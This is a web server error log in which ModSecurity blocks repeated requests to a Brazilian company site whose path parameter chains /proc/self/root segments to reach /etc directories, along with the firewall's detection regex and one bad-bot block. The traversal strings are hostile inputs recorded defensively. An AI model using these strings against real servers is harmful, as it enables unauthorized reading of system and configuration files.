[Thu Mar 19 03:59:10.819099 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:57402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuevta6ubjKNq_cu4YGmAAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:59:15.899321 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.228.61:57194] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuewwbLMZ6AikZjR9UkrwAAAAA"]
[Thu Mar 19 03:59:20.432048 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:57414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuexeyqAr6etmhZHNorfwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:59:23.507210 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:38122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuey-oXxyEfFpUF8f_Y0AAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:59:24.793397 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:38132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuezNa6ubjKNq_cu4YGqgAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:59:26.115020 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:38134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuezuyqAr6etmhZHNorgAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:59:28.635394 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:38146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue0OyqAr6etmhZHNorhAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:59:29.319453 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:49252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue0da6ubjKNq_cu4YGsAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:59:30.646158 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.241.31:47958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue0v-YZRR_7pZ7nDJUzwAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:59:32.068633 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.243.128:45444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue1BkFeYa1D6dYQnC0ZgAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:59:34.115342 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:47970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue1vu8EFLIOrSqIptlLwAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:59:36.739691 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:45460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue2Mdf6f5d65gmYZQ6yQAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:59:38.222435 2026] [:error] [pid 19093:tid 140411548894976] [client 74.7.243.128:45464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue2l_V7PWP6ixUYl6DaQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:59:39.579797 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:33386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue2-oXxyEfFpUF8f_Y1QAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:59:41.882723 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.243.128:33392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue3V_V7PWP6ixUYl6DawAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:59:46.155941 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:33398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue4vu8EFLIOrSqIptlNAAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:59:48.444022 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:33402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue5AbLMZ6AikZjR9UkugAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:59:59.936771 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:33292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue79a6ubjKNq_cu4YGywAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:00:10.079623 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:33524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue-uyqAr6etmhZHNorqQAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:00:13.572314 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.243.128:51002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abue_QbLMZ6AikZjR9UkzwAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:00:18.707609 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:51016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufAta6ubjKNq_cu4YG5AAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:00:20.227206 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:57966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufBNa6ubjKNq_cu4YG5wAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
